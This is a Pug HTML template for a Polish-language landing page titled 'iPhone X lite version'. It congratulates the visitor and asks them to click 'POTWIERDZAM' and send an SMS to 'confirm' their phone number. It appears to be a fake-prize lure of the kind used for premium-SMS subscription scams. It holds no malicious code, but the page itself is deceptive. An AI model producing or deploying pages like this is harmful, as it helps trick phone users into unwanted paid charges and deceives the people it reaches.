doctype
html(lang='en')
	head
		title iPhone X lite version (PO)
		include inc/meta
		include inc/css
	body
		.body
			.page2
				.header
					h1 GRATULACJE!
				img.logo(src="img/img-header-2-nd-screen.png", srcset="img/img-header-2-nd-screen@2x.png 2x, img/img-header-2-nd-screen@3x.png 3x")
				.help 
					.help-text Kliknij “POTWIERDZAM”<br>i wyślij SMSa aby potwierdzić<br>swój numer telefonu
					a.btn.btn-primary(href="#a") POTWIERDZAM
				br
			include inc/secure
			include inc/apps
			include inc/text
			include inc/footer
		include inc/js